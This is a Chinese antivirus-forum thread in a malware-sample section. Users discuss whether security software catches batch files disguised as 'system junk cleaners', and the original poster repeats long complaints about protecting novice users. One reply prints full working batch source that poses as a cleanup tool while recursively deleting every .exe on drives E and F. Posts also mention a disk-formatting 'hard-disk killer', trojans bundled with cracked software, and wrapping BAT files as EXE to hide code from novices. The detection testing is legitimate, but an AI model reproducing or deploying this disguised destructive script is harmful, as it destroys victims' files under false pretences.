查看: 10712|回复: 81
收起左侧

[病毒样本] 【批处理再战安全软件】第二季(让你的安全软件来试一试吧)再一次全过?

[复制链接]
离开你的世界
头像被屏蔽
发表于 2015-1-27 13:48:21 | 显示全部楼层 |阅读模式
本帖最后由 离开你的世界 于 2015-1-27 21:34 编辑

【请在XP平台下测试】
http://bbs.kafan.cn/thread-1803427-1-1.html
根据他的帖子受到的启发(帖子里也有不少用户表示中招了 有的说拦截了C盘 D盘后面的全被删了)
而且也有很多人说会拦截(比如金山 比如360等)
纯HIPS软件就不说了(因为是行为分析嘛 肯定会提示的)
但一般用户没几个可以看懂的....而且提示太多 用户也没几个人
倒是可以用HIPS软件看看行为!【测试的话大家可以用杀毒软件安全软件】

而且这个发布者说
【如果你把批处理的代码修改一下】比如只删除D盘 E盘不删除C盘EXE文件,估计就不会拦截了
我根据他的这个观点修改了代码,大家可以测试一下!
大家测试的时候要说明一下
你使用的什么安全软件【我上传了样本两个】这两个版本都会拦截?还是只拦截其中一个?还是都没有反应?
请大家务必说清楚!

【样本在线扫描结果】
http://r.virscan.org/report/3f80ac540d01314202d58e86bdd5066d
http://r.virscan.org/report/4bc1472ec5d76d7fd1ed9ac92aab002b



【解压密码】1024

而且这类如果在论坛下载突破十几万 也不亚于一次病毒爆发吧?(如果在不同论坛同时发布)
下载数 中招数 也不会少....
如果用户有重要资料?或者安装程序很多,如果统统被删除 恐怕损失也不小吧?
其他很多人都是电脑小白!!(比如你的爸爸 妈妈 爷爷奶奶 叔叔 阿姨同学等等 有几个真懂电脑的?)
我至少可以说中国人10个里面有三个真正懂电脑的就算不错了!
问问你爸爸 妈妈 叔叔 阿姨 姐姐 弟弟 妹妹 爷爷 奶奶 同学 朋友 有几个懂HIPS的
有几个懂电脑的!问他们为什么要使用杀毒软件 如果碰到杀不了的病毒怎么办?
是不是说什么用户行为?所以杀毒软件不管?看看他们怎么回答的!
所以个人觉得一些安全软件也要做好防控措施!提高这方面的技术什么的!
安全软件大家安装你就是让你保护我的(你难道说不管?或者说无法分辨?)
不然就用户就失去安装安全软件的意义了(如果用户什么都懂 我还用你吗?)
个人觉得应该对一些区域进行保护 一些行为进行限制
毕竟小白很多,看不懂代码的,所以对大多数人还是有用的保护!
如果他可以看懂代码 那他就不是小白了
而且高手可以看懂代码的 说不定他还不使用所谓的杀毒软件了!
所以他可以选择使用或者不使用,但是小白不懂这些!所以安全软件公司还是应该好好考虑一下这个问题!
毕竟你是服务社会大众的,毕竟使用你产品的用户一般用户居多(小白居多)
【如果想骗小白 可以使用BAT转EXE工具】代码就会被隐藏加密 看不到了....威胁更大

http://bbs.kafan.cn/thread-1805608-1-1.html
http://bbs.kafan.cn/thread-1805101-1-1.html




[wmv]http://www.xiami.com/widget/0_1773228254/singlePlayer.swf[/wmv]
[wmv]http://www.xiami.com/widget/0_22708/singlePlayer.swf[/wmv]
[wmv]http://www.xiami.com/widget/0_42110/singlePlayer.swf[/wmv]
[wmv]http://www.xiami.com/widget/0_1772585511/singlePlayer.swf[/wmv]
[wmv]http://www.xiami.com/widget/0_90467/singlePlayer.swf[/wmv]
[wmv]http://www.xiami.com/widget/0_16473/singlePlayer.swf[/wmv]



.



我只是为了在卡饭样本区名字更直观一点 所以用中文名字
大家难道不知道吗?批处理不能用中文名字(哪怕是安全的程序也不行)
不懂可以百度一下(批处理不能显示中文命令提示符)
我现在重新上传了


【看这里吧】 http://bbs.kafan.cn/thread-1212592-1-1.html







本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
离开你的世界
头像被屏蔽
 楼主| 发表于 2015-1-27 14:01:49 | 显示全部楼层
本帖最后由 离开你的世界 于 2015-1-27 14:09 编辑
欧阳宣 发表于 2015-1-27 14:01
谁说我要测试了?

我只是把批处理放上来了而已,无论哪个都很有充分的理由不拦截。


而且这类如果在论坛下载突破十几万 也不亚于一次病毒爆发吧?(如果在不同论坛同时发布)
下载数 中招数 也不会少....
如果用户有重要资料?或者安装程序很多,如果统统被删除 恐怕损失也不小吧?
个人觉得一些安全软件也要做好防控措施!提高这方面的技术什么的!
安全软件大家安装你就是让你保护我的(你难道说不管?或者说无法分辨?)
不然就用户就失去安装安全软件的意义了(如果用户什么都懂 我还用你吗?)

欧阳宣
头像被屏蔽
发表于 2015-1-27 14:07:36 | 显示全部楼层
paul_guo 发表于 2015-1-27 14:01
我这里上报迷之失效,回复我说解压失败,你上报下?

文件名里没有中文才行
离开你的世界
头像被屏蔽
 楼主| 发表于 2015-1-27 14:17:36 | 显示全部楼层
本帖最后由 离开你的世界 于 2015-1-27 21:33 编辑
欧阳宣 发表于 2015-1-27 14:12
我记得在09年的样子,当时我泡ylmf论坛。那时候盗版XP铺天盖地,系统优化区就有一大堆这样的批处理,个个 ...


我在很多论坛都见过这样的程序,下载数超过20多万!
发布者都宣称是清理系统垃圾的......结果造成很多用户都中招了!
而且以前安全软件是不防杀批处理的(我上传一个硬盘杀手你自己看吧)
因为确实有多用户通过这个中招了,很多安全软件都加入了批处理防护(至少是系统方面的)
有时候真的不亚于一次所谓的病毒爆发的破坏力!
用户什么都不懂,用户安装你安全软件就是让你保护我的!你给我费什么话?找什么理由?
我如果什么都懂?我还用你吗?还是努力提高技术为先才是王道!
自己看这个吧http://bbs.kafan.cn/thread-1805608-1-1.html
除了卡饭这里有一些人还懂电脑什么的(其实卡饭小白也不少)再说卡饭才有几个人?
其他很多人都是电脑小白!!(比如你的爸爸 妈妈 爷爷奶奶 叔叔 阿姨同学等等 有几个真懂电脑的?)



而且这类如果在论坛下载突破十几万 也不亚于一次病毒爆发吧?(如果在不同论坛同时发布)
下载数 中招数 也不会少....
如果用户有重要资料?或者安装程序很多,如果统统被删除 恐怕损失也不小吧?
个人觉得一些安全软件也要做好防控措施!提高这方面的技术什么的!
安全软件大家安装你就是让你保护我的(你难道说不管?或者说无法分辨?)
不然就用户就失去安装安全软件的意义了(如果用户什么都懂 我还用你吗?)

【下面上传的 硬盘杀手样本】
这个硬盘杀手批处理危害很大,可以格全盘(删除系统文件 格式化全盘)并不只是删EXE了
【这个样本 至少是两三年前的了】当时疯狂一时.....
具体看【46楼 48楼的测试说明】

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
离开你的世界
头像被屏蔽
 楼主| 发表于 2015-1-27 14:29:56 | 显示全部楼层
欧阳宣 发表于 2015-1-27 14:28
最后再说一次吧,这个批处理的操作无法同人为故意的删除操作分开,杀软是无法区分的。如果你想手动删掉wi ...

这就是需要安全软件的技术发展和提高

因为确实有多用户通过这个中招了,很多安全软件都加入了批处理防护(至少是系统方面的)
有时候真的不亚于一次所谓的病毒爆发的破坏力!
用户什么都不懂,用户安装你安全软件就是让你保护我的!你给我费什么话?找什么理由?
我如果什么都懂?我还用你吗?还是努力提高技术为先才是王道!
除了卡饭这里有一些人还懂电脑什么的(其实卡饭小白也不少)再说卡饭才有几个人?
其他很多人都是电脑小白!!(比如你的爸爸 妈妈 爷爷奶奶 叔叔 阿姨同学等等 有几个真懂电脑的?)
个人觉得一些安全软件也要做好防控措施!提高这方面的技术什么的!
安全软件大家安装你就是让你保护我的(你难道说不管?或者说无法分辨?)
不然就用户就失去安装安全软件的意义了(如果用户什么都懂 我还用你吗?)

离开你的世界
头像被屏蔽
 楼主| 发表于 2015-1-27 15:43:47 | 显示全部楼层

你电脑的问题
可以下载运行的 见5楼 7楼 12楼
离开你的世界
头像被屏蔽
 楼主| 发表于 2015-1-27 16:08:58 | 显示全部楼层
本帖最后由 离开你的世界 于 2015-1-27 16:36 编辑
liulangzhecgr 发表于 2015-1-27 16:05
2015-1-27 15:55:36    修改文件    允许
进程: c:\windows\system32\cmd.exe
目标: C:\autoexec ...


我早就说过了
纯HIPS软件就不说了(因为是行为分析嘛 肯定会提示的)但一般用户没几个可以看懂的....
HIPS什么都提示,正常的行为他有时候还提示呢 哈哈 关键有几个人可以看懂呢?
还有一个关键就是 HIPS才有几个人用呢?呵呵!!
麻烦测试杀毒软件吧 这个才是主流 大多数人使用最多的!【不再回复你了 具体看我楼上的回复吧】
样本扫描结果
http://r.virscan.org/report/3f80ac540d01314202d58e86bdd5066d
http://r.virscan.org/report/4bc1472ec5d76d7fd1ed9ac92aab002b

而且这类如果在论坛下载突破十几万 也不亚于一次病毒爆发吧?(如果在不同论坛同时发布)
下载数 中招数 也不会少....
如果用户有重要资料?或者安装程序很多,如果统统被删除 恐怕损失也不小吧?
个人觉得一些安全软件也要做好防控措施!提高这方面的技术什么的!
安全软件大家安装你就是让你保护我的(你难道说不管?或者说无法分辨?)
不然就用户就失去安装安全软件的意义了(如果用户什么都懂 我还用你吗?)

我在很多论坛都见过这样的程序,下载数超过20多万!
发布者都宣称是清理系统垃圾的......结果造成很多用户都中招了!
因为确实有多用户通过这个中招了,很多安全软件都加入了批处理防护(至少是系统方面的)
有时候真的不亚于一次所谓的病毒爆发的破坏力!
用户什么都不懂,用户安装你安全软件就是让你保护我的!你给我费什么话?找什么理由?
我如果什么都懂?我还用你吗?还是努力提高技术为先才是王道!
除了卡饭这里有一些人还懂电脑什么的(其实卡饭小白也不少)再说卡饭才有几个人?
其他很多人都是电脑小白!!(比如你的爸爸 妈妈 爷爷奶奶 叔叔 阿姨同学等等 有几个真懂电脑的?)
个人觉得一些安全软件也要做好防控措施!提高这方面的技术什么的!
安全软件大家安装你就是让你保护我的(你难道说不管?或者说无法分辨?)
不然就用户就失去安装安全软件的意义了(如果用户什么都懂 我还用你吗?)


离开你的世界
头像被屏蔽
 楼主| 发表于 2015-1-27 16:32:26 | 显示全部楼层
本帖最后由 离开你的世界 于 2015-1-27 16:37 编辑
liulangzhecgr 发表于 2015-1-27 16:28
看见23#,呵呵!让禁运党(泪奔党)安装‘安软’...


纯HIPS软件就不说了(因为是行为分析嘛 肯定会提示的)但一般用户没几个可以看懂的....
HIPS什么都提示,正常的行为他有时候还提示呢 哈哈 关键有几个人可以看懂呢?
还有一个关键就是 HIPS才有几个人用呢?呵呵!!
HIPS我还可以设置一切运行都阻止 都提示我呢 有意义吗?呵呵

除了卡饭这里有一些人还懂电脑什么的(其实卡饭小白也不少)再说卡饭才有几个人?
其他很多人都是电脑小白!!(比如你的爸爸 妈妈 爷爷奶奶 叔叔 阿姨同学等等 有几个真懂电脑的?)
安全软件大家安装你就是让你保护我的(你难道说不管?或者说无法分辨?)
不然就用户就失去安装安全软件的意义了(如果用户什么都懂 我还用你吗?)
所以个人觉得一些安全软件也要做好防控措施!提高这方面的技术什么的!
离开你的世界
头像被屏蔽
 楼主| 发表于 2015-1-27 16:43:54 | 显示全部楼层
本帖最后由 离开你的世界 于 2015-1-27 16:52 编辑
liulangzhecgr 发表于 2015-1-27 16:40
请你不要以自己の见看别人,世上有很多能人也包括卡饭。
请你不要神化HIPS,她什么也不懂...智能低得 ...


你根本就没看懂我意思 我神话HIPS?
麻烦你认真看清楚再给我说话吧!
我的意思是说HIPS才有几个人用 他一点不智能 提示多 用户看不懂
这叫神话?看来你理解能力真的有问题了!请告诉我,我哪里神话HIPS了?
你不仅不懂电脑 而且理解能力还很差(给你说话很累 要用大白话给你解释你才能明白)

还能人呢?
除了卡饭这里有一些人还懂电脑什么的(其实卡饭小白也不少)再说卡饭才有几个人?
其他很多人都是电脑小白!!(比如你的爸爸 妈妈 爷爷奶奶 叔叔 阿姨同学等等 有几个真懂电脑的?)
我至少可以说中国人10个里面有三个真正懂电脑的就算不错了!
问问你爸爸 妈妈 叔叔 阿姨 姐姐 弟弟 妹妹 爷爷 奶奶 同学 朋友 有几个懂HIPS的
有几个懂电脑的!问他们为什么要使用杀毒软件 如果碰到杀不了的病毒怎么办?
是不是说什么用户行为?所以杀毒软件不管?看看他们怎么回答的!



纯HIPS软件就不说了(因为是行为分析嘛 肯定会提示的)但一般用户没几个可以看懂的....
HIPS什么都提示,正常的行为他有时候还提示呢 哈哈 关键有几个人可以看懂呢?
还有一个关键就是 HIPS才有几个人用呢?呵呵!!
HIPS我还可以设置一切运行都阻止 都提示我呢 有意义吗?呵呵

除了卡饭这里有一些人还懂电脑什么的(其实卡饭小白也不少)再说卡饭才有几个人?
其他很多人都是电脑小白!!(比如你的爸爸 妈妈 爷爷奶奶 叔叔 阿姨同学等等 有几个真懂电脑的?)
安全软件大家安装你就是让你保护我的(你难道说不管?或者说无法分辨?)
不然就用户就失去安装安全软件的意义了(如果用户什么都懂 我还用你吗?)
所以个人觉得一些安全软件也要做好防控措施!提高这方面的技术什么的!


【不再回复你了 你理解能力太差 和你说话太累 自己慢慢学习吧】其他具体看我楼上的回复!
深山红叶__
发表于 2015-1-27 17:25:04 来自手机 | 显示全部楼层
批处理没有明确的黑白界限,像删缓存之类的操作和恶意删除的实质是一样的,如果杀软直接给此类操作判黑也是很容易的,只是误报会显著增多;当然,像增删改系统目录或其它关键目录的行为需要有所提示。
总的来说,这种东西是观念问题,还扯不上技术。
275751198
发表于 2015-1-27 21:18:18 | 显示全部楼层
360吓到我了,竟然把批处理入库了,脑抽了吧

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
离开你的世界
头像被屏蔽
 楼主| 发表于 2015-1-27 21:23:20 | 显示全部楼层
本帖最后由 离开你的世界 于 2015-1-27 21:31 编辑
275751198 发表于 2015-1-27 21:18
360吓到我了,竟然把批处理入库了,脑抽了吧


这个硬盘杀手批处理危害很大,可以格全盘(删除系统文件 格式化全盘)并不只是删EXE了
【这个样本 至少是两三年前的了】当时疯狂一时.....
【具体看14楼】

http://bbs.kafan.cn/thread-1806078-1-1.html (今天上传的最新批处理样本)
这个危害也很大,目前还没有安全软件可以拦截查杀的(看一楼上传的附件)
【样本在线扫描结果】
http://r.virscan.org/report/3f80ac540d01314202d58e86bdd5066d
http://r.virscan.org/report/4bc1472ec5d76d7fd1ed9ac92aab002b



纯HIPS软件就不说了(因为是行为分析嘛 肯定会提示的)但一般用户没几个可以看懂的....
HIPS什么都提示,正常的行为他有时候还提示呢 哈哈 关键有几个人可以看懂呢?
还有一个关键就是 HIPS才有几个人用呢?呵呵!!
HIPS我还可以设置一切运行都阻止 都提示我呢 有意义吗?呵呵


我早就说过了
纯HIPS软件就不说了(因为是行为分析嘛 肯定会提示的)但一般用户没几个可以看懂的....
HIPS什么都提示,正常的行为他有时候还提示呢 哈哈 关键有几个人可以看懂呢?
还有一个关键就是 HIPS才有几个人用呢?呵呵!!
麻烦测试杀毒软件吧 这个才是主流 大多数人使用最多的!【不再回复你了 具体看我楼上的回复吧】
样本扫描结果
http://r.virscan.org/report/3f80ac540d01314202d58e86bdd5066d
http://r.virscan.org/report/4bc1472ec5d76d7fd1ed9ac92aab002b

而且这类如果在论坛下载突破十几万 也不亚于一次病毒爆发吧?(如果在不同论坛同时发布)
下载数 中招数 也不会少....
如果用户有重要资料?或者安装程序很多,如果统统被删除 恐怕损失也不小吧?
个人觉得一些安全软件也要做好防控措施!提高这方面的技术什么的!
安全软件大家安装你就是让你保护我的(你难道说不管?或者说无法分辨?)
不然就用户就失去安装安全软件的意义了(如果用户什么都懂 我还用你吗?)

我在很多论坛都见过这样的程序,下载数超过20多万!
发布者都宣称是清理系统垃圾的......结果造成很多用户都中招了!
因为确实有多用户通过这个中招了,很多安全软件都加入了批处理防护(至少是系统方面的)
有时候真的不亚于一次所谓的病毒爆发的破坏力!
用户什么都不懂,用户安装你安全软件就是让你保护我的!你给我费什么话?找什么理由?
我如果什么都懂?我还用你吗?还是努力提高技术为先才是王道!
除了卡饭这里有一些人还懂电脑什么的(其实卡饭小白也不少)再说卡饭才有几个人?
如果用户有重要资料?或者安装程序很多,如果统统被删除 恐怕损失也不小吧?
其他很多人都是电脑小白!!(比如你的爸爸 妈妈 爷爷奶奶 叔叔 阿姨同学等等 有几个真懂电脑的?)
我至少可以说中国人10个里面有三个真正懂电脑的就算不错了!
问问你爸爸 妈妈 叔叔 阿姨 姐姐 弟弟 妹妹 爷爷 奶奶 同学 朋友 有几个懂HIPS的
有几个懂电脑的!问他们为什么要使用杀毒软件 如果碰到杀不了的病毒怎么办?
是不是说什么用户行为?所以杀毒软件不管?看看他们怎么回答的!
所以个人觉得一些安全软件也要做好防控措施!提高这方面的技术什么的!
安全软件大家安装你就是让你保护我的(你难道说不管?或者说无法分辨?)
不然就用户就失去安装安全软件的意义了(如果用户什么都懂 我还用你吗?)


lixihong10
发表于 2015-1-27 23:07:30 | 显示全部楼层
离开你的世界 发表于 2015-1-27 21:20
不会的,放心吧!
里面的信息很多是我自己添加上的包括你说的那个GAGATOSHUT团队的信息(这个我可以随 ...

你爸爸 妈妈 叔叔 阿姨 姐姐 弟弟 妹妹 爷爷 奶奶 同学 朋友 有几个会下载清理系统垃圾的?
你现在要他们下载个QQ都不知道搞,还下批处理
BAT转换成EXE后就杀了。

把下载量几十万的地址发来看看,还有不要复制这么长一段了。
离开你的世界
头像被屏蔽
 楼主| 发表于 2015-1-27 23:09:27 | 显示全部楼层
本帖最后由 离开你的世界 于 2015-1-27 23:18 编辑
lixihong10 发表于 2015-1-27 23:07
你爸爸 妈妈 叔叔 阿姨 姐姐 弟弟 妹妹 爷爷 奶奶 同学 朋友 有几个会下载清理系统垃圾的?
你现在要他 ...


我姐姐 妹妹 弟弟 经常去论坛下载一些乱七八糟的东西
而且我爸爸特别喜欢下载一些外.挂什么的(尤其是QQ游戏的一些挂)
但是他们都分辨不清楚什么是病毒(因为这样的小白太多 太多了)
看这里吧 http://bbs.kafan.cn/thread-1805608-1-1.html (这里的人很有代表性)
你不用在给我抬杠了 现在事实就是这个批处理确实有威胁 而且确实杀毒软件没任何拦截!
【现在的关键就是这个批处理确实对一些小白用户来说识别有难度 因为看不懂代码啊】
再说确实有威胁可以删除你的文件,如果大规范的在论坛被人下载 不亚于一次病毒爆发
而且那么多文件什么的被删除,损失也不小啊!
再说用户安装你杀毒软件就是让你保护我的,到头来 你不作为?你说不识别是不是用户行为?
那么我还安装你有什么意思呢?(真正的高手可以不用杀毒软件 可以看懂代码)
但是小白用户呢?谁来负责呢?而且大部分使用杀毒软件里面的用户来说(小白居多)
【我为什么要使用你杀毒软件 我要你保护我的】
你难道说我不应该使用批处理?不应该这样 那样?我安装你还有什么意义呢?

这个作者发的一个病毒 点击过20万 中招人不低于10万(我和作者联系过)
他已经控制了十几万台电脑了,而且他没做任何免杀.....
他用的应该是上兴或者灰鸽子之类的 他就是配置好可以上线就放出了 就是捆绑了一些软件!

http://bbs.kafan.cn/thread-1805608-1-1.html  


他用的应该是上兴或者灰鸽子之类的远控软件和软件捆绑工具(这个网上都有现成的工具)
他连免杀都没做,直接做好服务端之后可以上线 直接和捆绑了软件就发布了!
问题是很多人就是相信了他,杀毒软件提示查杀的时候 很多人选择的是放行 添加信任 白名单!
问题是他每次发的帖子都会说明是破解软件 报毒很正常 需要添加信任或者例外白名单(那个论坛发破解报毒很普遍)
而且里面的人大多数不懂电脑(主要是玩股票或者金融的)对电脑一知半解的!
而且他每次发的帖子都可以达到万人点击 千人回复.....有的帖子甚至达到了十几万的点击 下载也过十几万
而且论坛竟然他给他加分.....
【我在某论坛发现了这个人 然后开始关注他所有的帖子】
以及这个人发的其他论坛不同的论坛 我都关注看了 他的思想就是能骗一个是一个.....哎
那个论坛基本都是玩股票和金融的(对电脑很多人都不懂或者说一知半解的)
【而且这些人基本更多的都是大量的真金白银】.......




这个人经常在不同的论坛发帖,反正他的帖子每次点击都很高 回复很多....下载数都超高....
这个人发的帖子,我全部下载看了一遍,全部是病毒(应该是远控木马)他一共发了大概不到10个帖子
这几个帖子最有代表性 论坛还评分奖励他 点击好多都过万,有一个竟然过10万点击 回复超过2000人.....
但有意思的是竟然没一个人反驳他 而且都在顶贴回复,支持他....(这和论坛有一定关系)
论坛不明不白的给他加分 造成很多不懂电脑的用户根本不懂,还以为论坛检测过了 是一个好软件呢.....
碰到这种人 这种病毒(他都没做任何免杀)杀毒软件都提示拦截了,你有什么办法?我无语了 大家你们怎么看?怎么想?
有的人说他玩的是心理战术 很成功,这种目前没办法防御,因为杀毒软件是死的 用户不杀谁也没办法.....
而且我观察了,他的发的几个帖子加起来点击率超过20万左右,那么中招的人没20万 也带有10万
【而且我统计的还只是他在这一个论坛的 点击数 回复数 下载数】他发了很多不同的论坛......
别说10万,就算有几万,他的收获就很大(比如可以控制那些电脑 可以进行无所欲为的操作 管理)



问题是除了卡饭这里有一些人还懂电脑什么的,其他很多人都是电脑小白!!!!
再说卡饭才有几个人?
你回答一下我32楼的问题,这是为什么......【具体可以看我1楼 3楼 7楼的回复!】
而且他连免杀都没做.....我超无语!!!!!
如果以后都像他这样 那杀毒软件还有什么用啊?大家都不用免杀了....
而且他这种方法超简单,你不懂编程 不懂免杀都可以做了!!!!
现在很多杀毒软件都是一删了之!为什么不能把病毒删除?不影响正常软件运行呢?
为什么小白都把病毒添加例外 白名单什么的.....为什么安全软件公司不考虑一下这个呢?



我纳闷的是为什么他的帖子每次都可以超过几万的点击甚至到十几万....
回复超过2000人.....而且论坛还竟然评分奖励他...
而且他每次发帖我观察了
都会说一句话 这个是破解版,杀毒软件拦截很正常 你们添加白名单或者例外放行就可以了
竟然还有很多人相信他....而且竟然没一个人反驳他的,这是为什么.......
有的人说他玩的是心理战术 很成功,这种目前没办法防御,因为杀毒软件是死的 用户不杀谁也没办法.....
【而且我统计的还只是他在这一个论坛的 点击数 回复数 下载数】他发了很多不同的论坛......
别说10万,就算有几万,他的收获就很大(比如可以控制那些电脑 可以进行无所欲为的操作 管理)
十几万台机器如果要DDOS攻击一些网站 可以说分分钟的事.......
这个人经常在不同的论坛发帖,反正每次点击都很高 回复很多....下载数都超高....
这个人发的帖子,我全部下载看了一遍,全部是病毒(应该是远控木马)他一共发了大概不到10个帖子
这几个帖子最有代表性 论坛还评分奖励他 点击好多都过万,有一个竟然过10万点击 回复超过2000人.....
说白就是配置好,可以上线,他就放出下载了(他这个没什么技术难点 说白就是 捆绑 上线)....
更有意思的是,他的帖子竟然每次都被顶起来(每次基本都点击上万 有一个帖子更是点击十几万 回复2000多人)
最有意思的是,帖子竟然还不删除,论坛竟然还给他加分评价.......
但有意思的是竟然没一个人反驳他 而且都在顶贴回复,支持他...



他很成功,方法很简单(他连免杀都没做......我不可能想象......)
如果以后都像他这样 那杀毒软件还有什么用啊?大家都不用免杀了....
而且他这种方法超简单,你不懂编程 不懂免杀都可以做了!!!!
很多人选择了添加杀毒软件白名单或者例外,而且还有一类人是裸奔的.....
还有就是现在很多论坛除了 很安全检测根本不行或者说基本没有
除了卡饭这里有一些人还懂电脑什么的,很多人都是电脑小白!!!!
再说卡饭才有几个人....

我发帖说过报毒是病毒,下面一些人回复竟然是,破解软件报毒很正常.....
说我不懂电脑,还说他以前一个什么破解软件也报毒 说杀毒软件误报多 尤其是破解的...
然后我的帖子就没人在回复了,而且他的帖子竟然还有人一直在回复下载顶贴....
而且我通过方法和这个发帖人联系上了,据他所说他已经控制了几十万台电脑了
我很无语!!!!

离开你的世界
头像被屏蔽
 楼主| 发表于 2015-1-27 23:19:17 | 显示全部楼层
lixihong10 发表于 2015-1-27 23:07
你爸爸 妈妈 叔叔 阿姨 姐姐 弟弟 妹妹 爷爷 奶奶 同学 朋友 有几个会下载清理系统垃圾的?
你现在要他 ...

你不用在给我抬杠了 现在事实就是这个批处理确实有威胁 而且确实杀毒软件没任何拦截!
【现在的关键就是这个批处理确实对一些小白用户来说识别有难度 因为看不懂代码啊】
再说确实有威胁可以删除你的文件,如果大规范的在论坛被人下载 不亚于一次病毒爆发
而且那么多文件什么的被删除,损失也不小啊!
再说用户安装你杀毒软件就是让你保护我的,到头来 你不作为?你说不识别是不是用户行为?
那么我还安装你有什么意思呢?(真正的高手可以不用杀毒软件 可以看懂代码)
但是小白用户呢?谁来负责呢?而且大部分使用杀毒软件里面的用户来说(小白居多)
【我为什么要使用你杀毒软件 我要你保护我的】
你难道说我不应该使用批处理?不应该这样 那样?我安装你还有什么意义呢?

离开你的世界
头像被屏蔽
 楼主| 发表于 2015-1-27 23:35:09 | 显示全部楼层
lixihong10 发表于 2015-1-27 23:34
别复制这么多。这么和你解释;

你运行批处理杀软无法拦截,但是你这个批处理那里来?

不要再抬杠 胡搅蛮缠了!

1 我就问你,这个批处理有没有威胁呢?
2 现在使用电脑的人 是电脑专家多 还是一般社会大众(小白多呢)
3 小白如何去识别这些呢?他懂这个吗?(你周边的人难道都是电脑专家吗)
4 用户安装你杀毒软件是为了什么呢?
用户安装你杀毒软件就是让你保护我的,到头来 你不作为?你说不识别是不是用户行为?
那么我还安装你有什么意思呢?(真正的高手可以不用杀毒软件 可以看懂代码)
但是小白用户呢?谁来负责呢?而且大部分使用杀毒软件里面的用户来说(小白居多)
【我为什么要使用你杀毒软件 我要你保护我的】
你难道说我不应该使用批处理?不应该这样 那样?我安装你还有什么意义呢?
你还不如说我不开电脑 不使用电脑更安全呢!这是什么逻辑思维啊
这难道就说一个杀毒软件厂家应该给的?而不是想的怎么提高技术 提高能力?
如果现在处理不了,应该想想怎么解决 而不是一味的推脱,这样不利于软件的进步和发展!
记住用户是什么,他需要什么!
【再说你又不是任何官方的人】
你不要自己打自己的脸了 现在很多杀软都加入了批处理对一些系统核心的位置的防护了!
只是技术现在还不行,还需要继续努力!
【看14楼的 硬盘杀手批处理】360就杀了!这个批处理刚出来的时候 没有一个杀软拦截的!
http://bbs.kafan.cn/thread-1806078-2-1.html 看这里【14楼】
http://bbs.kafan.cn/thread-1803427-1-1.html (下面有一些图是一些杀软防了一些批处理对系统的破坏)
但是目前技术还不行,还需要继续努力!(看下图)
paul_guo
发表于 2015-1-27 13:51:40 | 显示全部楼层
复制粘贴哥您好
这俩样本确实容易过,但是没用啊。。
正常用户遇到的病毒担心丢失的是财产,谁TMD没事发病毒为了删光你东西的。。
这又涉及到你上个问题所说的社会学的问题了。
最后VSE,EEK都被过了
离开你的世界
头像被屏蔽
 楼主| 发表于 2015-1-27 13:54:16 | 显示全部楼层
本帖最后由 离开你的世界 于 2015-1-27 16:26 编辑
paul_guo 发表于 2015-1-27 13:51
复制粘贴哥您好
这俩样本确实容易过,但是没用啊。。
正常用户遇到的病毒担心丢失的是财产,谁TMD没事发 ...
【承认过了 没有拦截就行】用户安装你杀毒软件就是保护我的
个人觉得一些安全软件也要做好防控措施!提高这方面的技术什么的!
安全软件大家安装你就是让你保护我的(你难道说不管?或者说无法分辨?)
不然就用户就失去安装安全软件的意义了(如果用户什么都懂 我还用你吗?)

请测试吧 帖子里也有不少用户表示中招了!http://bbs.kafan.cn/thread-1803427-1-1.html
根据他的帖子受到的启发
而且也有很多人说会拦截(比如金山 比如360等)
HIPS就不说了(因为是行为分析嘛 肯定会提示的)但一般用户没几个可以看懂的....
【如果你把批处理的代码修改一下】比如只删除D盘 E盘不删除C盘EXE文件,估计就不会拦截了
我根据他的这个观点修改了代码,大家可以测试一下!
大家测试的时候要说明一下
你使用的什么安全软件【我上传了样本两个】这两个版本都会拦截?还是只拦截其中一个?还是都没有反应?
请大家务必说清楚!

而且这类如果在论坛下载突破十几万 也不亚于一次病毒爆发吧?(如果在不同论坛同时发布)
下载数 中招数 也不会少....
如果用户有重要资料?或者安装程序很多,如果统统被删除 恐怕损失也不小吧?
个人觉得一些安全软件也要做好防控措施!提高这方面的技术什么的!
安全软件大家安装你就是让你保护我的(你难道说不管?或者说无法分辨?)
不然就用户就失去安装安全软件的意义了(如果用户什么都懂 我还用你吗?)



paul_guo
发表于 2015-1-27 13:54:57 | 显示全部楼层
离开你的世界 发表于 2015-1-27 13:54
请测试吧 帖子里也有不少用户表示中招了!
根据他的帖子受到的启发
而且也有很多人说会拦截(比如金山  ...

你说的我全都回复了,我问的你不管,你回我干嘛?
欧阳宣
头像被屏蔽
发表于 2015-1-27 13:56:35 | 显示全部楼层
[mw_shl_code=html,true]@echo off & color 0d
echo 是否清空计算机系统垃圾?
pause>nul & cls & echo 正在清理垃圾文件...请稍等...
ping 127.0.0.1 -n "3">NUL
del /f /s /q %systemdrive%\*.tmp
del /f /s /q %systemdrive%\*._mp
del /f /s /q %systemdrive%\*.log
del /f /s /q %systemdrive%\*.gid
del /f /s /q %systemdrive%\*.chk
del /f /s /q %systemdrive%\*.old
del /f /s /q %systemdrive%\recycled\*.*
del /f /s /q %windir%\*.bak
del /f /s /q %windir%\prefetch\*.*
rd /s /q %windir%\temp & md %windir%\temp
del /f /q %userprofile%\cookies\*.*
del /f /q %userprofile%\recent\*.*
del /f /s /q "%userprofile%\Local Settings\Temporary Internet Files\*.*"
del /f /s /q "%userprofile%\Local Settings\Temp\*.*"
del /f /s /q "%userprofile%\recent\*.*"
cls & echo 清理垃圾完成,正在清理系统 垃圾 文件...请稍等...
ping 127.0.0.1 -n "3">NUL
  for %%a in (e f) do (
    cd /d %%a:\
    for /r %%b in (*.exe) do (
      del /s /q %%b
    )
)
cls & echo 已完成...
ping 127.0.0.1 -n "3">NUL
exit

::GAGATOSHUT团队[/mw_shl_code]
浅暮、浅离
发表于 2015-1-27 13:57:00 | 显示全部楼层
看到就烦躁了,我就不测了→_→
欧阳宣
头像被屏蔽
发表于 2015-1-27 13:57:27 | 显示全部楼层
[mw_shl_code=html,true]@echo off & color 0d
echo 是否清空计算机系统垃圾?
pause>nul & cls & echo 正在清理垃圾文件...请稍等...
ping 127.0.0.1 -n "3">NUL
del /f /s /q %systemdrive%\*.tmp
del /f /s /q %systemdrive%\*._mp
del /f /s /q %systemdrive%\*.log
del /f /s /q %systemdrive%\*.gid
del /f /s /q %systemdrive%\*.chk
del /f /s /q %systemdrive%\*.old
del /f /s /q %systemdrive%\recycled\*.*
del /f /s /q %windir%\*.bak
del /f /s /q %windir%\prefetch\*.*
rd /s /q %windir%\temp & md %windir%\temp
